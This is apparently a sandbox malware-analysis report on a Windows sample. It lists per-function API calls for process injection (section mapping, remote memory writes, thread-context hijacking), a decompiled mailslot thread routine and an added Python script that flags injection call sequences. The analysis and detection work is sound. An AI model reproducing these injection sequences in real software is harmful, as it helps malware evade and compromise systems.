  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:39E01E2F5A5FBFECA5ABC01131E7E3A1
Total matches:33
Initial Analysis Report:Open
Initial sample Analysis ID:63143
Initial sample SHA 256:9F7B02032349637F0D8C962DAB2F08F0E3269C295AC0DE385C60274E89390D4B
Initial sample name:01.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
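The function blocks above list, per decompiled function, the calls Joe Sandbox attributed to it, including calls made from subcalls: NtCreateSection and NtMapViewOfSection in one function, NtWriteVirtualMemory followed by NtSetContextThread in another, SuspendThread/ResumeThread with NtUnmapViewOfSection in a subcall in a third. An analyst usually wants to pull those call lists out of a report like this one and check them against known injection sequences rather than read the blocks one by one. The following Python is an added example written for this page, not code from the report, from Joe Sandbox, or from the analysed sample: it parses the `Name.MODULE(args), ref: ADDR` lines in the format shown above, keyed by each block's Opcode ID, and flags functions whose call set covers a rule. The sample input is copied from three of the blocks above; the rule names and the APIs they require are this example's own choices, not Joe Sandbox classifications.

```python
import re
from collections import OrderedDict

# One 'APIs' entry as printed in the report, with or without the subcall prefix, e.g.
#   • NtCreateSection.NTDLL(?,000F001F,...), ref: 002E27EA
#   • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(...), ref: 002E277D
#   • memset.NTDLL ref: 002E280F
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
)
# Each function block carries a 64-hex Opcode ID ahead of its 'APIs' list; use it as the key.
FUNC_HEADER = re.compile(r"^\s*[•*-]\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})")

# A rule fires when every listed API occurs in one function's call list (subcalls included).
# The names are this example's own, not Joe Sandbox classifications.
RULES = {
    "section-mapping injection": {"NtCreateSection", "NtMapViewOfSection"},
    "remote write + thread hijack": {"NtWriteVirtualMemory", "NtSetContextThread"},
    "suspend/resume thread control": {"SuspendThread", "ResumeThread"},
}


def parse_report(lines):
    """Group call names by function: opcode id -> {'apis', 'modules', 'subcalls'} sets."""
    funcs = OrderedDict()
    current = None
    for line in lines:
        header = FUNC_HEADER.match(line)
        if header:
            current = header.group("id")
            funcs[current] = {"apis": set(), "modules": set(), "subcalls": set()}
            continue
        call = API_LINE.match(line)
        if call and current is not None:
            funcs[current]["apis"].add(call.group("api"))
            funcs[current]["modules"].add(call.group("module").upper())
            if call.group("sub"):
                funcs[current]["subcalls"].add(call.group("sub").upper())
    return funcs


def match_rules(funcs, rules=RULES):
    """Opcode id -> sorted names of the rules its call set satisfies (functions with hits only)."""
    hits = OrderedDict()
    for fid, info in funcs.items():
        names = sorted(name for name, needed in rules.items() if needed <= info["apis"])
        if names:
            hits[fid] = names
    return hits


# Constructed input: lines copied from three of the function blocks in this report.
SAMPLE = """\
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
APIs
  • memset.NTDLL ref: 002E21A3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
"""

if __name__ == "__main__":
    for fid, names in match_rules(parse_report(SAMPLE.splitlines())).items():
        print(fid[:16], "->", ", ".join(names))
```

The rules are deliberately coarse (set membership, no ordering); the `ref:` addresses are available in the same lines if a stricter, order-aware rule is wanted.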
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax; // heap handle; E00401033 passes it to HeapReAlloc
				_v28 = _a4; // context shared by both worker threads
				 *0x4030e8 = 0x736c6e70; // executed; "pnls" as a little-endian DWORD, the String ID listed above
				// Thread 1, E00401034: mailslot reader (decompiled below as E00401033, which starts one byte earlier).
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					// Thread 2, E004010FB: mailslot writer (decompiled below).
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						// Join the writer first; a failed query or a non-zero exit code kills the reader.
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							// Then join the reader; if it also returned 0, hand the context (now holding
							// the received buffer and its length) to E00401593, which uses VirtualAlloc.
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4; // 0 on success, otherwise a Win32 error code
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
